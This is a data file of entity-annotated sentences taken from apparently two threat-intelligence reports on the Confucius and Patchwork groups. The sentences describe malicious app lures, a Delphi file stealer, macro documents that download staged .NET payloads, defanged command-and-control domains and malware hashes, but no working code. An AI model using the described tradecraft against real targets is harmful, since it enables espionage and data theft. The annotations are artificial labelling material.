{"id":4195,"text":"Signed Binary Proxy Execution: Rundll32 T1036.005","entities":[{"id":49999,"label":"attack-pattern","start_offset":0,"end_offset":49}],"relations":[],"Comments":[]} {"id":4196,"text":"Masquerading: Match Legitimate Name or Location T1197 BITS Jobs T1070.006","entities":[{"id":50000,"label":"attack-pattern","start_offset":14,"end_offset":73}],"relations":[],"Comments":[]} {"id":4197,"text":"Indicator Removal on Host: Timestomp Credential Access T1003.001 OS Credential Dumping: LSASS Memory T1552.002","entities":[{"id":50001,"label":"attack-pattern","start_offset":27,"end_offset":64},{"id":50002,"label":"attack-pattern","start_offset":65,"end_offset":110}],"relations":[],"Comments":[]} {"id":4198,"text":"OS Credential Dumping: Credentials in Registry Lateral Movement T1021.002","entities":[{"id":50004,"label":"attack-pattern","start_offset":0,"end_offset":73}],"relations":[],"Comments":[]} {"id":4199,"text":"Remote Services: SMB\/Windows Admin Shares Discovery T1087.002","entities":[{"id":50005,"label":"attack-pattern","start_offset":17,"end_offset":61}],"relations":[],"Comments":[]} {"id":4200,"text":"Account Discovery: Domain Account T1482 Domain Trust Discovery T1083 File and Directory Discovery Collection T1005 Data from Local System Command and control T1071.001","entities":[{"id":50008,"label":"attack-pattern","start_offset":69,"end_offset":114},{"id":50006,"label":"attack-pattern","start_offset":0,"end_offset":39},{"id":50007,"label":"attack-pattern","start_offset":40,"end_offset":68},{"id":50009,"label":"attack-pattern","start_offset":115,"end_offset":168}],"relations":[],"Comments":[]} {"id":4201,"text":"Application layer protocol: web protocols T1095 Non-Application layer protocol T1090.001 Proxy: Internal Proxy Exfiltration T1567.002","entities":[{"id":50010,"label":"attack-pattern","start_offset":0,"end_offset":47},{"id":50011,"label":"attack-pattern","start_offset":48,"end_offset":88},{"id":50012,"label":"attack-pattern","start_offset":89,"end_offset":133}],"relations":[],"Comments":[]} {"id":4202,"text":"Exfiltration to Cloud Storage Tags APT & Targeted Attacks | Endpoints | Research | Articles, News, Reports","entities":[],"relations":[],"Comments":[]} {"id":4203,"text":"Updated the appendix on August 30, 2018 to fix formatting and add new information.","entities":[{"id":50013,"label":"TIME","start_offset":24,"end_offset":39}],"relations":[],"Comments":[]} {"id":4204,"text":"Back in February, we noted the similarities between the Patchwork and Confucius groups and found that, in addition to the similarities in their malware code, both groups primarily went after targets in South Asia.","entities":[{"id":50016,"label":"threat-actor","start_offset":70,"end_offset":79},{"id":50014,"label":"TIME","start_offset":8,"end_offset":16},{"id":50015,"label":"threat-actor","start_offset":56,"end_offset":65},{"id":50017,"label":"location","start_offset":202,"end_offset":212}],"relations":[{"id":898,"from_id":50015,"to_id":50016,"type":"related-to"},{"id":899,"from_id":50015,"to_id":50017,"type":"targets"},{"id":900,"from_id":50016,"to_id":50017,"type":"targets"},{"id":901,"from_id":50016,"to_id":50015,"type":"related-to"}],"Comments":[]} {"id":4205,"text":"During the months that followed in which we tracked Confucius’ activities, we found that they were still aiming for Pakistani targets.","entities":[{"id":50019,"label":"location","start_offset":116,"end_offset":125},{"id":50018,"label":"threat-actor","start_offset":52,"end_offset":61}],"relations":[{"id":902,"from_id":50018,"to_id":50019,"type":"targets"}],"Comments":[]} {"id":4206,"text":"During their previous campaign, we found Confucius using fake romance websites to entice victims into installing malicious Android applications.","entities":[{"id":50020,"label":"threat-actor","start_offset":41,"end_offset":50},{"id":50021,"label":"SOFTWARE","start_offset":123,"end_offset":130}],"relations":[],"Comments":[]} {"id":4207,"text":"This time, the threat actor seems to have a new modus operandi, setting up two new websites and new payloads with which to compromise its targets.","entities":[],"relations":[],"Comments":[]} {"id":4208,"text":"Fake Android porn app and Windows chat applications as lures","entities":[],"relations":[],"Comments":[]} {"id":4209,"text":"The first website uses adult content as a lure, via an Android application called Fuddi Duniya, which links to a website that displays nude pictures every day.","entities":[{"id":50022,"label":"SOFTWARE","start_offset":55,"end_offset":63},{"id":50023,"label":"malware","start_offset":82,"end_offset":94}],"relations":[],"Comments":[]} {"id":4210,"text":"The app’s APK is linked directly from the homepage, with a disclaimer stating that Google Play does not allow pornography in their store.","entities":[{"id":50024,"label":"SOFTWARE","start_offset":83,"end_offset":94}],"relations":[],"Comments":[]} {"id":4211,"text":" Figure 1: fake website with a link to download the Fuddi Duniya app.","entities":[{"id":50025,"label":"malware","start_offset":52,"end_offset":64}],"relations":[],"Comments":[]} {"id":4212,"text":"The displayed Urdu text could be translated as “Real women, girls, and housewives || Download the app now More than thousands of women app.”","entities":[],"relations":[],"Comments":[]} {"id":4213,"text":"The app’s features are similar to the previous malicious Android application, such as having the ability to record audio and steal SMS, accounts, contacts and certain file types from specific directories.","entities":[{"id":50026,"label":"SOFTWARE","start_offset":57,"end_offset":64},{"id":50028,"label":"attack-pattern","start_offset":125,"end_offset":177},{"id":50027,"label":"attack-pattern","start_offset":108,"end_offset":120}],"relations":[],"Comments":[]} {"id":4214,"text":"In addition, the application now retrieves the last known location and uses the development platform Google Firebase to upload the stolen content.","entities":[{"id":50029,"label":"SOFTWARE","start_offset":101,"end_offset":116}],"relations":[],"Comments":[]} {"id":4215,"text":" Figure 2: Stealing function excerpt from Fuddi Duniya Android app","entities":[{"id":50030,"label":"malware","start_offset":42,"end_offset":66}],"relations":[],"Comments":[]} {"id":4216,"text":"The second fake website is again related to chat, with a background suggesting that it can help find users a partner.","entities":[],"relations":[],"Comments":[]} {"id":4217,"text":"Initially, a link to a malicious Android application hosted on Google Play that shared the same features as the application described above was present.","entities":[{"id":50031,"label":"SOFTWARE","start_offset":63,"end_offset":74},{"id":50032,"label":"SOFTWARE","start_offset":33,"end_offset":40}],"relations":[],"Comments":[]} {"id":4218,"text":"But after we reached out to Google while carrying out the research, the application was removed from the store and the link was removed from the fake website.","entities":[{"id":50033,"label":"identity","start_offset":28,"end_offset":34}],"relations":[],"Comments":[]} {"id":4219,"text":" Figure 3. Screenshot of the second fake website","entities":[],"relations":[],"Comments":[]} {"id":4220,"text":"Same as with the fake Tweety chat application we described in detail in our previous research, a Windows application with real chat features based on the open-source chat application RocketChat was offered.","entities":[{"id":50034,"label":"malware","start_offset":17,"end_offset":45}],"relations":[],"Comments":[]} {"id":4221,"text":"Similarly, this application also comes bundled with malicious .NET code.","entities":[],"relations":[],"Comments":[]} {"id":4222,"text":"While small and relatively simple, we found this malicious application interesting to analyze as it revealed the countries targeted by the threat actor.","entities":[],"relations":[],"Comments":[]} {"id":4223,"text":"The application is a simple downloader that sends some basic information (username, antivirus, IP address, and operating system version) encrypted using triple Data Encryption Standard (DES). Figure 4.","entities":[],"relations":[],"Comments":[]} {"id":4224,"text":"Sample of the app’s code Periodically, the malware tries to contact the Command-and-Control (C&C) server with the username encoded into parameters.","entities":[],"relations":[],"Comments":[]} {"id":4225,"text":"Based on the information they retrieve, the operators can then decide to instruct the malware to download the second stage payload.","entities":[],"relations":[],"Comments":[]} {"id":4226,"text":"This function is similar to the various versions of backdoors (such as sctrls and sip_telephone) that we analyzed in our previous blog post and whitepaper.","entities":[],"relations":[],"Comments":[]} {"id":4227,"text":"An interesting feature of the downloader: It uses an online service to retrieve the victim's IP address and country, which it compares with a list of allowed countries.","entities":[],"relations":[],"Comments":[]} {"id":4228,"text":"If the victim seemingly comes from a different country, the program will self-delete and quit.","entities":[],"relations":[],"Comments":[]} {"id":4229,"text":"This list contains: Most of the South and Southeast Asian countries (including Mongolia) Most of the Middle Eastern countries","entities":[{"id":50035,"label":"location","start_offset":33,"end_offset":58},{"id":50036,"label":"location","start_offset":80,"end_offset":88},{"id":50037,"label":"location","start_offset":102,"end_offset":126}],"relations":[],"Comments":[]} {"id":4230,"text":"Most of the African countries Only Ukraine in Europe Only Trinidad and Tobago in the Americas No country from Oceania Figure 5.","entities":[{"id":50038,"label":"location","start_offset":35,"end_offset":42},{"id":50039,"label":"location","start_offset":46,"end_offset":52},{"id":50042,"label":"location","start_offset":110,"end_offset":117},{"id":50040,"label":"location","start_offset":58,"end_offset":77},{"id":50041,"label":"location","start_offset":85,"end_offset":93}],"relations":[],"Comments":[]} {"id":4231,"text":"Excerpt of the valid country list We noted that it does both client-side and server-side IP filtering, showing that the attacker has improved its infrastructure.","entities":[],"relations":[],"Comments":[]} {"id":4232,"text":"At the end of last year, a C&C from the same threat actor was not only accessible from any IP address, but it was possible to browse the server directory tree without authentication.","entities":[],"relations":[],"Comments":[]} {"id":4233,"text":"After impersonating a fake victim of interest, we obtained a second stage payload (Detected as TROJ_DELF.XXWZ), which is a filestealer based on the Delphi programming language similar to the “svctrls” malware described in our previous blogpost.","entities":[{"id":50043,"label":"malware","start_offset":95,"end_offset":109}],"relations":[],"Comments":[]} {"id":4234,"text":"This one is called “sysctrls” and it looks for files with the following extensions: ","entities":[],"relations":[],"Comments":[]} {"id":4235,"text":"Extension File Type .doc, docx Microsoft Word document .xls,.xlsx","entities":[],"relations":[],"Comments":[]} {"id":4236,"text":"Microsoft Excel document .ppt, .pptx Microsoft Powerpoint presentation .pptx","entities":[],"relations":[],"Comments":[]} {"id":4237,"text":"Microsoft Powerpoint presentation .png, .jpg, .jpeg Image file .pst, .ost Microsoft Outlook file .csv","entities":[],"relations":[],"Comments":[]} {"id":4238,"text":"Spreadsheet file ","entities":[],"relations":[],"Comments":[]} {"id":4239,"text":"It then sends them via a POST HTTP request to windefendr[.]com\/description.php.","entities":[{"id":50044,"label":"URL","start_offset":46,"end_offset":78}],"relations":[],"Comments":[]} {"id":4240,"text":"Further analysis of this filestealer revealed interesting links with other threat actor groups.","entities":[],"relations":[],"Comments":[]} {"id":4241,"text":"The Delphi Link","entities":[],"relations":[],"Comments":[]} {"id":4242,"text":"We already mentioned that Confucius had possible links to other groups in our previous blog post, which mentioned code sharing between Patchwork and Confucius.","entities":[{"id":50045,"label":"threat-actor","start_offset":26,"end_offset":35},{"id":50046,"label":"threat-actor","start_offset":135,"end_offset":144},{"id":50047,"label":"threat-actor","start_offset":149,"end_offset":158}],"relations":[{"id":903,"from_id":50046,"to_id":50047,"type":"related-to"}],"Comments":[]} {"id":4243,"text":"Both groups used a backdoor with the same configuration file structure and commands.","entities":[],"relations":[],"Comments":[]} {"id":4244,"text":"We found more code shared among the two threat actor’s malware, as Patchwork recently used multiple Delphi malware similar to some of the Delphi malware we described before.","entities":[{"id":50049,"label":"malware","start_offset":138,"end_offset":152},{"id":50050,"label":"malware","start_offset":100,"end_offset":114},{"id":50048,"label":"threat-actor","start_offset":67,"end_offset":76}],"relations":[{"id":904,"from_id":50048,"to_id":50050,"type":"uses"},{"id":905,"from_id":50049,"to_id":50050,"type":"duplicate-of"}],"Comments":[]} {"id":4245,"text":"We initially spotted some visual similarities between the malware used.","entities":[],"relations":[],"Comments":[]} {"id":4246,"text":"Although no forms are displayed while the malware is running, we can see its TForm object in the Delphi decompiler.","entities":[],"relations":[],"Comments":[]} {"id":4247,"text":"The TForm object often has two TTimer objects — but sometimes we have seen one or even three of these objects — usually with random names.","entities":[],"relations":[],"Comments":[]} {"id":4248,"text":"Occasionally, listboxes with encrypted strings are also added.","entities":[],"relations":[],"Comments":[]} {"id":4249,"text":"Figure 6: Decompiled Form structure of Confucius’ sample (d971842441c83c1bba05742d124620f5741bb5d5da9ffb31f06efa4bbdcf04ee, Detected as TSPY_CONFSTEAL.A) Figure 7:","entities":[{"id":50051,"label":"SHA2","start_offset":58,"end_offset":122},{"id":50052,"label":"malware","start_offset":136,"end_offset":152}],"relations":[{"id":906,"from_id":50051,"to_id":50052,"type":"indicates"}],"Comments":[]} {"id":4250,"text":"Decompiled Form structure of Patchwork’s sample (795ae4097aa3bd5932be4110f6bd992f46d605d4c9e3afced314454d35395a59, Detected as TROJ_DELF.XXWZ)","entities":[{"id":12743,"label":"threat-actor","start_offset":29,"end_offset":38},{"id":12745,"label":"SHA2","start_offset":49,"end_offset":113},{"id":50053,"label":"malware","start_offset":127,"end_offset":141}],"relations":[{"id":907,"from_id":12745,"to_id":50053,"type":"indicates"},{"id":908,"from_id":12743,"to_id":50053,"type":"uses"}],"Comments":[]} {"id":4251,"text":"While looking into any of the TTimers’ OnTimer methods, we often found a certain kind of structure: A pointer to an encrypted string stored in an EDX register followed by the call to the decryption function.","entities":[],"relations":[],"Comments":[]} {"id":4252,"text":" Figure 8: Calling the decryption function This encouraged us to analyze the string encryption routines thoroughly.","entities":[],"relations":[],"Comments":[]} {"id":4253,"text":"Our analysis revealed three of them.","entities":[],"relations":[],"Comments":[]} {"id":4254,"text":"The first involves a very simple routine that flips every bit of the string.","entities":[],"relations":[],"Comments":[]} {"id":4255,"text":"The second algorithm involves a hardcoded key, which is transformed by taking the five lower bits of each character, and then used as a XOR key.","entities":[],"relations":[],"Comments":[]} {"id":4256,"text":"In some cases, the key is split in half in the binary, so it is first reunited before being used.","entities":[],"relations":[],"Comments":[]} {"id":4257,"text":"Finally, our third algorithm uses a 94-character substitution table.","entities":[],"relations":[],"Comments":[]} {"id":4258,"text":"This algorithm was previously discussed by security researchers in a Confucius-related blog post.","entities":[{"id":50054,"label":"threat-actor","start_offset":69,"end_offset":78}],"relations":[],"Comments":[]} {"id":4259,"text":"For each of these routines, we found a recent sample going back to a domain name belonging to Patchwork’s infrastructure.","entities":[{"id":50055,"label":"threat-actor","start_offset":94,"end_offset":103}],"relations":[],"Comments":[]} {"id":4260,"text":"The substitution tables of the third algorithm were randomly generated at build time, while the attacker seemingly set the keys used in the second algorithm.","entities":[],"relations":[],"Comments":[]} {"id":4261,"text":"We found six different keys in the latter category that were different for the Patchwork and Confucius group.","entities":[{"id":50056,"label":"threat-actor","start_offset":79,"end_offset":88},{"id":50057,"label":"threat-actor","start_offset":93,"end_offset":102}],"relations":[],"Comments":[]} {"id":4262,"text":"Figure 9.","entities":[],"relations":[],"Comments":[]} {"id":4263,"text":"On the left, Confucius code, on the right, Patchwork’s code","entities":[{"id":50058,"label":"threat-actor","start_offset":13,"end_offset":22},{"id":50059,"label":"threat-actor","start_offset":43,"end_offset":52}],"relations":[],"Comments":[]} {"id":4264,"text":"Interestingly, one of those keys, “xldbszcd”, was found in a file stealer used by Confucius (472ea4929c5e0fb4e29597311ed90a14c57bc67fbf26f81a3aac042aa3dccb55, Detected as TSPY_CONFSTEAL.A) as well as in two other file stealers.","entities":[{"id":50061,"label":"SHA2","start_offset":93,"end_offset":157},{"id":50062,"label":"malware","start_offset":171,"end_offset":187},{"id":50060,"label":"threat-actor","start_offset":82,"end_offset":91}],"relations":[{"id":909,"from_id":50061,"to_id":50062,"type":"indicates"},{"id":910,"from_id":50060,"to_id":50062,"type":"uses"}],"Comments":[]} {"id":4265,"text":"One file stealer (cca74bb322ad7833a21209b1418c9837e30983daec30d199a839f46075ee72f2, Detected as TSPY_DELF.SUW) published by security researchers in 2013 and linked to the domain myflatnet[.]com, was attributed by several parties to the Hangover group.","entities":[{"id":50067,"label":"threat-actor","start_offset":236,"end_offset":250},{"id":50063,"label":"SHA2","start_offset":18,"end_offset":82},{"id":50064,"label":"malware","start_offset":96,"end_offset":109},{"id":50065,"label":"TIME","start_offset":148,"end_offset":152},{"id":50066,"label":"DOMAIN","start_offset":178,"end_offset":193}],"relations":[{"id":911,"from_id":50063,"to_id":50064,"type":"indicates"},{"id":912,"from_id":50064,"to_id":50066,"type":"communicates-with"},{"id":913,"from_id":50064,"to_id":50067,"type":"attributed-to"}],"Comments":[]} {"id":4266,"text":"The other file stealer (1f0dabd61947b6df8a392b77a0eae33777be3caad13698aecc223b54ab4b859a, Detected as TROJ_DELF.XXWZ) is related to a domain reported in September 2016.","entities":[{"id":50069,"label":"malware","start_offset":102,"end_offset":116},{"id":50070,"label":"TIME","start_offset":153,"end_offset":167},{"id":50068,"label":"SHA2","start_offset":24,"end_offset":88}],"relations":[{"id":914,"from_id":50068,"to_id":50069,"type":"indicates"}],"Comments":[]} {"id":4267,"text":"That report also mentioned InPage software targeting and Delphi backdoors.","entities":[],"relations":[],"Comments":[]} {"id":4268,"text":"Figure 10.","entities":[],"relations":[],"Comments":[]} {"id":4269,"text":"Left: Confucius group, Middle: Hangover group, Right: Unnamed group","entities":[{"id":50071,"label":"threat-actor","start_offset":6,"end_offset":21},{"id":50072,"label":"threat-actor","start_offset":31,"end_offset":45},{"id":50073,"label":"threat-actor","start_offset":54,"end_offset":67}],"relations":[],"Comments":[]} {"id":4270,"text":"After some research, we found multiple Delphi backdoors that used any of the three decryption routines.","entities":[],"relations":[],"Comments":[]} {"id":4271,"text":"The backdoors also linked to an infrastructure matching old Hangover domains as well as the infrastructure of domains from the September 2016 blog post.","entities":[{"id":50074,"label":"TIME","start_offset":127,"end_offset":141},{"id":50075,"label":"threat-actor","start_offset":60,"end_offset":68}],"relations":[],"Comments":[]} {"id":4272,"text":"Some of these samples were several years old and had left the original name of the bit-flip decryption algorithm, which was “EnDecrypt”.","entities":[],"relations":[],"Comments":[]} {"id":4273,"text":"This algorithm matches the following code snippet.","entities":[],"relations":[],"Comments":[]} {"id":4274,"text":"Patchwork's Ongoing Campaigns","entities":[{"id":12808,"label":"threat-actor","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":4275,"text":"Aside from their Delphi malware, Patchwork is still active.","entities":[{"id":50076,"label":"threat-actor","start_offset":33,"end_offset":42}],"relations":[],"Comments":[]} {"id":4276,"text":"Lately, they have been sending multiple RTF files exploiting CVE-2017-8570.","entities":[{"id":50077,"label":"vulnerability","start_offset":61,"end_offset":74}],"relations":[],"Comments":[]} {"id":4277,"text":"The dropped payloads are modified versions of the Remote Administration Tool QuasarRAT that can be traced to the domains sastind-cn[.]org and tautiaos[.]com.","entities":[{"id":50080,"label":"DOMAIN","start_offset":142,"end_offset":156},{"id":50078,"label":"malware","start_offset":77,"end_offset":86},{"id":50079,"label":"DOMAIN","start_offset":121,"end_offset":137}],"relations":[{"id":915,"from_id":50078,"to_id":50079,"type":"communicates-with"},{"id":916,"from_id":50078,"to_id":50080,"type":"communicates-with"}],"Comments":[]} {"id":4278,"text":"Figure 11.","entities":[],"relations":[],"Comments":[]} {"id":4279,"text":"Process tree after a successful infection","entities":[],"relations":[],"Comments":[]} {"id":4280,"text":"The attackers sometimes design the weaponized documents to look like legitimate documents of interest to the target.","entities":[],"relations":[],"Comments":[]} {"id":4281,"text":"The documents are also unusually large — often more than 10 megabytes.","entities":[],"relations":[],"Comments":[]} {"id":4282,"text":"Figure 12.","entities":[],"relations":[],"Comments":[]} {"id":4283,"text":"On the left, the weaponized document.","entities":[],"relations":[],"Comments":[]} {"id":4284,"text":"On the right, the legitimate document from CSBA.","entities":[{"id":50081,"label":"identity","start_offset":43,"end_offset":47}],"relations":[],"Comments":[]} {"id":4285,"text":"Note that the weaponized document was crafted to look like it came from CSBA but does not imply that CSBA or its related assets have been compromised ","entities":[{"id":50082,"label":"identity","start_offset":72,"end_offset":76},{"id":50083,"label":"identity","start_offset":101,"end_offset":105}],"relations":[],"Comments":[]} {"id":4286,"text":"The group still uses the Badnews malware, a backdoor with information-stealing and file-executing capabilities, albeit updated with a slight modification in the encryption routine at the end of 2017, when they added Blowfish encryption on top of their custom encryption described in our former Patchwork blogpost.","entities":[{"id":50084,"label":"malware","start_offset":25,"end_offset":40},{"id":50085,"label":"attack-pattern","start_offset":58,"end_offset":78},{"id":50086,"label":"attack-pattern","start_offset":83,"end_offset":97},{"id":50087,"label":"TIME","start_offset":187,"end_offset":198},{"id":50088,"label":"threat-actor","start_offset":294,"end_offset":303}],"relations":[{"id":917,"from_id":50084,"to_id":50085,"type":"uses"},{"id":918,"from_id":50084,"to_id":50086,"type":"uses"}],"Comments":[]} {"id":4287,"text":"Defending against Confucius and Patchwork Threat actors like Confucius and Patchwork are known for their large arsenal of tools and ever-evolving techniques that can render traditional security solutions — which are often not designed to handle the persistent and sophisticated threats detailed in this blog — ineffective.","entities":[{"id":50089,"label":"threat-actor","start_offset":18,"end_offset":27},{"id":50090,"label":"threat-actor","start_offset":32,"end_offset":41},{"id":50091,"label":"threat-actor","start_offset":61,"end_offset":70},{"id":50092,"label":"threat-actor","start_offset":75,"end_offset":84}],"relations":[],"Comments":[]} {"id":4288,"text":"To help combat these kinds of threats organizations will need to take a more proactive and focused security posture that can cover the most ground in terms of security.","entities":[],"relations":[],"Comments":[]} {"id":4289,"text":"Some specific security measures organizations can implement: Recognize social engineering attempts.","entities":[],"relations":[],"Comments":[]} {"id":4290,"text":"Malicious mobile apps are common infection vectors for cybercriminals, as they can attract specific target audiences.","entities":[],"relations":[],"Comments":[]} {"id":4291,"text":"In this case, Confucius went with the common adage “sex sells” Proactively monitor the organization’s network.","entities":[{"id":50093,"label":"threat-actor","start_offset":14,"end_offset":23}],"relations":[],"Comments":[]} {"id":4292,"text":"Threat actors are notorious for creating stealthy malware that can bypass superficial network monitoring.","entities":[],"relations":[],"Comments":[]} {"id":4293,"text":"A more proactive stance that includes proper application of firewalls and intrusion detection and prevention systems can help mitigate the impact of an attack Implement network segmentation.","entities":[],"relations":[],"Comments":[]} {"id":4294,"text":"Even with the best security technology, there is still a chance of an attack slipping through.","entities":[],"relations":[],"Comments":[]} {"id":4295,"text":"Separating the network into individual parts, as well as restricting access to only those who really need it, can mitigate the damage that occurs in case of a successful attack.","entities":[],"relations":[],"Comments":[]} {"id":4296,"text":"Update systems regularly.","entities":[],"relations":[],"Comments":[]} {"id":4297,"text":"Everything from endpoints to network software to IoT devices should be patched and updated to prevent or minimize the chance of a threat actor exploiting a vulnerability In an ideal scenario, an organization’s in-house security team implement all of these and other security measures.","entities":[],"relations":[],"Comments":[]} {"id":4298,"text":"The reality is that IT departments of small to large-sized organizations are not equipped to handle the more advanced threats that groups like Confucius use in their attacks.","entities":[{"id":50094,"label":"threat-actor","start_offset":143,"end_offset":152}],"relations":[],"Comments":[]} {"id":4299,"text":"Since these teams also handle the day-to-day IT requirements of the organization, taking on a more involved and proactive stance may not be easy.","entities":[],"relations":[],"Comments":[]} {"id":4300,"text":"In this case, an organization can look into third party security providers who can handle specialized work, such as root cause analysis and detailed research, and also provide a remediation plan that gives organizations a better chance against advanced threats.","entities":[],"relations":[],"Comments":[]} {"id":4301,"text":"Trend Micro Solutions Patchwork uses email as an entry point, which is why securing the email gateway is important.","entities":[{"id":50095,"label":"identity","start_offset":0,"end_offset":11},{"id":50096,"label":"threat-actor","start_offset":22,"end_offset":31}],"relations":[],"Comments":[]} {"id":4302,"text":"Trend Micro™ Email Security is a no-maintenance cloud solution that delivers continuously updated protection to stop spam, malware, spear phishing, ransomware, and advanced targeted attacks before they reach the network. Trend Micro™ Email Inspector and InterScan™ Web Security prevent malware from ever reaching end users.","entities":[{"id":50097,"label":"SOFTWARE","start_offset":0,"end_offset":27},{"id":50098,"label":"attack-pattern","start_offset":132,"end_offset":146},{"id":50099,"label":"attack-pattern","start_offset":164,"end_offset":189},{"id":50100,"label":"attack-pattern","start_offset":148,"end_offset":158},{"id":50101,"label":"SOFTWARE","start_offset":222,"end_offset":250},{"id":50102,"label":"SOFTWARE","start_offset":255,"end_offset":278}],"relations":[],"Comments":[]} {"id":4303,"text":"At the endpoint level, Trend Micro™ Smart Protection Suites deliver several capabilities that minimize the impact of Patchwork’s attacks.","entities":[{"id":12917,"label":"threat-actor","start_offset":117,"end_offset":126},{"id":50103,"label":"SOFTWARE","start_offset":23,"end_offset":59}],"relations":[],"Comments":[]} {"id":4304,"text":"These solutions are powered by Trend Micro XGen™ security, which provides a cross-generational blend of threat defense techniques against a full range of threats for data centers, cloud environments, networks, and endpoints.","entities":[{"id":50104,"label":"SOFTWARE","start_offset":31,"end_offset":48}],"relations":[],"Comments":[]} {"id":4305,"text":"It features high-fidelity machine learning to secure the gateway and endpoint data and applications, and protect physical, virtual, and cloud workloads.","entities":[],"relations":[],"Comments":[]} {"id":4306,"text":"This appendix contains the latest indicators of compromise (IOCs) related to the different groups.","entities":[],"relations":[],"Comments":[]} {"id":4307,"text":" Tags APT & Targeted Attacks | Endpoints | Research | Network","entities":[],"relations":[],"Comments":[]} {"id":4308,"text":"Introduction","entities":[],"relations":[],"Comments":[]} {"id":4309,"text":"While investigating the Confucius threat actor, we found a recent spear phishing campaign that utilizes Pegasus spyware-related lures to entice victims into opening a malicious document downloading a file stealer.","entities":[{"id":50105,"label":"attack-pattern","start_offset":66,"end_offset":80},{"id":50106,"label":"malware","start_offset":104,"end_offset":111}],"relations":[],"Comments":[]} {"id":4310,"text":"The NSO Group’s spyware spurred a collaborative investigation that found that it was being used to target high-ranking individuals in 11 different countries.","entities":[{"id":50108,"label":"threat-actor","start_offset":4,"end_offset":13}],"relations":[],"Comments":[]} {"id":4311,"text":"In this blog entry, we take a look at the lures used by the malicious actor and provide a short analysis of the file stealer used in the campaign, which was launched in early August.","entities":[{"id":50109,"label":"TIME","start_offset":175,"end_offset":181}],"relations":[],"Comments":[]} {"id":4312,"text":"The contents of the spear phishing email The campaign involves a two-step attack.","entities":[{"id":50110,"label":"attack-pattern","start_offset":20,"end_offset":34},{"id":50111,"label":"attack-pattern","start_offset":65,"end_offset":80}],"relations":[],"Comments":[]} {"id":4313,"text":"During the first phase, an email without a malicious payload containing content copied from a legitimate Pakistani newspaper’s article is sent to the target.","entities":[],"relations":[],"Comments":[]} {"id":4314,"text":"The sender address, which is spoofed, impersonates the PR wing of the Pakistani Armed Forces (info@ispr.gov.pk).","entities":[{"id":50113,"label":"identity","start_offset":70,"end_offset":92},{"id":50112,"label":"EMAIL","start_offset":94,"end_offset":110}],"relations":[],"Comments":[]} {"id":4315,"text":"Two days later, a second email — purportedly a warning from a Pakistani military about the Pegasus spyware — containing a cutt.ly link to a malicious encrypted Word document and the password for decryption will be sent to the target.","entities":[{"id":50115,"label":"malware","start_offset":91,"end_offset":98},{"id":50116,"label":"DOMAIN","start_offset":122,"end_offset":129},{"id":50114,"label":"identity","start_offset":62,"end_offset":80}],"relations":[],"Comments":[]} {"id":4316,"text":"The sender address impersonates a service similar to that on the first email (alert@ispr.gov.pk). Figure 1.","entities":[{"id":12964,"label":"EMAIL","start_offset":78,"end_offset":95}],"relations":[],"Comments":[]} {"id":4317,"text":"Spear-phishing email from early August.","entities":[{"id":50118,"label":"TIME","start_offset":32,"end_offset":38},{"id":50117,"label":"attack-pattern","start_offset":0,"end_offset":14}],"relations":[],"Comments":[]} {"id":4318,"text":"Notice the insertion of logos from the Pakistani Army, Air Force, Navy, and PR department.","entities":[{"id":50120,"label":"identity","start_offset":55,"end_offset":64},{"id":50121,"label":"identity","start_offset":66,"end_offset":70},{"id":50122,"label":"identity","start_offset":76,"end_offset":89},{"id":50119,"label":"identity","start_offset":39,"end_offset":53}],"relations":[],"Comments":[]} {"id":4319,"text":" If the target clicks on either the link or on the “unsubscribe” link, it will download a Word document from the domain parinari[.]xyz.","entities":[{"id":50123,"label":"DOMAIN","start_offset":124,"end_offset":138}],"relations":[],"Comments":[]} {"id":4320,"text":"The emails are sent either from an ExpressVPN exit node in Pakistan, or from a mail server under the attacker’s control.","entities":[{"id":50124,"label":"SOFTWARE","start_offset":35,"end_offset":45},{"id":50125,"label":"location","start_offset":59,"end_offset":67}],"relations":[],"Comments":[]} {"id":4321,"text":"Examining the encrypted document containing macros After entering the password mentioned in the message, a document containing macros is displayed on screen.","entities":[],"relations":[],"Comments":[]} {"id":4322,"text":" Figure 2. Malicious document containing macros ","entities":[{"id":50126,"label":"attack-pattern","start_offset":15,"end_offset":33}],"relations":[],"Comments":[]} {"id":4323,"text":"If the victim enables macros, the malicious code will be loaded.","entities":[],"relations":[],"Comments":[]} {"id":4324,"text":"If the victim enters any phone number and clicks “SUBMIT,” the text field will be replaced by the message “Phone Number Not Found.”","entities":[],"relations":[],"Comments":[]} {"id":4325,"text":"Behind the scenes, a .NET DLL file named skfk.txt, which is filled with content found inside the “Comments” property of the document, is created in the temporary directory.","entities":[{"id":50127,"label":"FILEPATH","start_offset":41,"end_offset":49}],"relations":[],"Comments":[]} {"id":4326,"text":"The file is then loaded in memory via PowerShell.","entities":[{"id":50128,"label":"tools","start_offset":38,"end_offset":48}],"relations":[],"Comments":[]} {"id":4327,"text":"Stage 1 is a simple download & execute program.","entities":[],"relations":[],"Comments":[]} {"id":4328,"text":"It downloads an ASCII file from the same domain and converts it into binary before loading it on to the memory and jump to a dynamic function.","entities":[],"relations":[],"Comments":[]} {"id":4329,"text":"Stage 2 is also .NET DLL file that downloads a third file from parinari[.]xyz, converts it from ASCII to binary, and then creates a scheduled task to load it.","entities":[{"id":50129,"label":"DOMAIN","start_offset":63,"end_offset":77}],"relations":[],"Comments":[]} {"id":4330,"text":"Stage 3 is similar to stage 1, with the only change being the URL to retrieve the next stage.","entities":[],"relations":[],"Comments":[]} {"id":4331,"text":"Stage 4 is the final payload (analyzed in the next section).","entities":[],"relations":[],"Comments":[]} {"id":4332,"text":"it is never written in clear text to the file disk.","entities":[],"relations":[],"Comments":[]} {"id":4333,"text":" Figure 3.","entities":[],"relations":[],"Comments":[]} {"id":4334,"text":"File stealer loading scheme ","entities":[],"relations":[],"Comments":[]} {"id":4335,"text":"It should be noted that most of the compilation timestamps of these DLL files have been modified by the attacker to a year in the far future (2060, 2099 …), and the server IP addresses are often hidden behind CloudFlare.","entities":[{"id":50130,"label":"SOFTWARE","start_offset":209,"end_offset":219}],"relations":[],"Comments":[]} {"id":4336,"text":"Analysis of the file stealer","entities":[],"relations":[],"Comments":[]} {"id":4337,"text":"The final payload is a .NET DLL file designed to steal documents and images with the following extensions: File extension Description TXT Text file PDF PDF file PNG Image file in PNG format JPG Image file in JPG format DOC Word document XLS Excel document XLM Excel document with macros ODP OpenDocument Presentation ODS OpenDocument Sheet ODT OpenDocument Text RTF Rich Text Format file PPT PowerPoint document XLSX Excel document XLSM Excel document with macros DOCX Word document PPTX PowerPoint document JPEG Image file in JPEG format ","entities":[],"relations":[],"Comments":[]} 